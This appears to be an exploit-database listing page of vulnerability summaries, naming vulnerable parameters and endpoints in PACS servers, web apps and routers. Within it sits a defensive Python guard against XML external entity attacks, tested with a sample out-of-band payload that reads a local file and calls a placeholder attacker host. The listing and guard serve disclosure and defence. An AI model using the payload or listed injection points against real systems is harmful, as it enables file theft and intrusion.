Exploitdb Exploits
31,364 exploits tracked across all sources.
Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection
by hyp3rlinx
Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
by Carlos Avila
MedDream PACS Server Premium 6.7.1.1 - 'email' SQL Injection
by Carlos Avila
Tenable WAS-Scanner 7.4.1708 - Remote Command Execution
by Sameer Goyal
QNAP Photo Station <= 5.7.0 - XSS
A cross-site scripting vulnerability in QNAP Photo Station versions 5.7.0 and earlier could allow remote attackers to inject JavaScript code into the affected application.
by Mitsuaki Shiraishi
CVSS 6.1
NovaRad NovaPACS Diagnostics Viewer 8.5.19.75 - XXE Injection
NovaRad NovaPACS Diagnostics Viewer 8.5.19.75 contains an unauthenticated XML External Entity (XXE) injection vulnerability in the XML preference import settings. Attackers can craft malicious XML files with DTD parameter entities to retrieve arbitrary system files through an out-of-band channel.
by LiquidWorm
CVSS 9.8
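The out-of-band technique described in the entry above needs a DOCTYPE carrying parameter entities, so an import endpoint that refuses any DTD before the parser sees the bytes closes that channel whatever the parser's own entity settings are. The following is an added example of such a pre-parse guard; it is not NovaRad's code, the preference format and the sample payload are constructed for illustration, and the attacker hostname is a placeholder.

```python
"""Pre-parse guard that refuses XML documents carrying a DTD.

Added example, not any vendor's code: a generic check for an XML
preference-import endpoint. Out-of-band XXE relies on a DOCTYPE with
parameter entities (<!ENTITY % ...>), so rejecting every DOCTYPE up
front removes the attack surface regardless of parser configuration.
"""
import re
import xml.etree.ElementTree as ET

# A DOCTYPE must be upper-case per the XML spec, but the match is
# case-insensitive as defence in depth against lenient pre-processing.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
_PARAM_ENTITY_RE = re.compile(rb"<!ENTITY\s+%", re.IGNORECASE)


class UnsafeXMLError(ValueError):
    """Raised when an import document is rejected before parsing."""


def has_dtd(data: bytes) -> bool:
    """True if the document declares a DOCTYPE or a parameter entity."""
    return bool(_DOCTYPE_RE.search(data) or _PARAM_ENTITY_RE.search(data))


def parse_preferences(data: bytes) -> dict:
    """Parse a (hypothetical) <prefs> document into a tag->text dict.

    The byte-level regex only sees what it can read, so non-UTF-8
    encodings are refused rather than silently scanned.
    """
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        raise UnsafeXMLError("only UTF-8 documents are accepted")
    if has_dtd(data):
        raise UnsafeXMLError("DOCTYPE/DTD is not allowed in a preference import")
    root = ET.fromstring(data)  # expat does not fetch external entities
    return {child.tag: (child.text or "") for child in root}


# Constructed sample inputs (not taken from any real product).
BENIGN = b"<prefs><theme>dark</theme><lang>en</lang></prefs>"

# Classic OOB shape: a parameter entity reads a local file, a second one
# pulls an attacker DTD that exfiltrates it. Hostname is a placeholder.
OOB_XXE = (
    b'<?xml version="1.0"?>\n'
    b"<!DOCTYPE prefs [\n"
    b'  <!ENTITY % file SYSTEM "file:///etc/hostname">\n'
    b'  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">\n'
    b"  %dtd;\n"
    b"]>\n"
    b"<prefs><theme>&send;</theme></prefs>"
)

if __name__ == "__main__":
    print(parse_preferences(BENIGN))
    try:
        parse_preferences(OOB_XXE)
    except UnsafeXMLError as exc:
        print("rejected:", exc)
```

The regex guard is a first line of defence, not a replacement for a parser that is configured to neither load DTDs nor resolve entities; the two belong together, and the encoding check exists because a byte-level scan cannot see a DOCTYPE written in UTF-16.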
Jorani 0.6.5 - Persistent XSS
Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.
by Javier Olmedo
CVSS 5.4
Jorani 0.6.5 - SQL Injection
An issue was discovered in Jorani 0.6.5. SQL Injection (error-based) allows a user of the application without permissions to read and modify sensitive information from the database used by the application via the startdate or enddate parameter to leaves/validate.
by Javier Olmedo
CVSS 5.4
Endress+Hauser WirelessHART Fieldgate SWG70 3.x Firmware - Path Traversal
Endress+Hauser WirelessHART Fieldgate SWG70 3.x devices allow Directory Traversal via the fcgi-bin/wgsetcgi filename parameter.
by Hamit CİBO
CVSS 5.3
Tenda D152 - XSS
Tenda D152 ADSL routers allow XSS via a crafted SSID.
by Sandip Dey
CVSS 5.4
Logicspice FAQ Script 2.9.7 - Arbitrary File Upload to Remote Command Execution
Logicspice FAQ Script 2.9.7 allows uploading arbitrary files via admin/faqs/faqimages; uploading a .php file leads to remote command execution.
by AkkuS
CVSS 7.2
Simple POS 4.0.24 - SQL Injection
Simple POS 4.0.24 allows SQL Injection via the columns[0][search][value] parameter of products/get_products/ in the management panel, as demonstrated by products/get_products/1.
by Renos Nikolaou
CVSS 9.8
Online Quiz Maker 1.0 SQL Injection via catid Parameter
Online Quiz Maker 1.0 contains SQL injection vulnerabilities in the catid and usern parameters that allow authenticated attackers to execute arbitrary SQL commands. Attackers can submit malicious POST requests to quiz-system.php or add-category.php with crafted SQL payloads in POST parameters to extract sensitive database information or bypass authentication.
by AkkuS
CVSS 7.1
FsPro Labs Event Log Explorer 4.6.1.2115 - XXE
FsPro Labs Event Log Explorer 4.6.1.2115 is vulnerable to XML External Entity injection via a crafted ".elx" file.
by hyp3rlinx
CVSS 3.3
Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)
by Nawaf Alkeraithe
D-Link DIR-615 Firmware - Buffer Overflow
D-Link DIR-615 devices have a buffer overflow via a long Authorization HTTP header.
by Aniket Dinda
CVSS 9.8
DamiCMS 6.0.0 - CSRF
An issue was discovered in DamiCMS 6.0.0. A CSRF vulnerability allows changing the administrator account's password via /admin.php?s=/Admin/doedit.
by Autism_JH
CVSS 8.8
WordPress Quizlord <= 2.0 - Stored XSS
The Quizlord plugin through 2.0 for WordPress is prone to Stored XSS via the title parameter in a ql_insert action to wp-admin/admin.php.
by Renos Nikolaou
CVSS 5.4
WordPress Jibu Pro <= 1.7 - Stored XSS
The Jibu Pro plugin through 1.7 for WordPress is prone to Stored XSS via the wp-content/plugins/jibu-pro/quiz_action.php name (aka Quiz Name) field.
by Renos Nikolaou
CVSS 5.4
Cybrotech CyBroHttpServer 1.0.3 - Path Traversal
Cybrotech CyBroHttpServer 1.0.3 allows Directory Traversal via a ../ in the URI.
by Emre ÖVÜNÇ
CVSS 5.3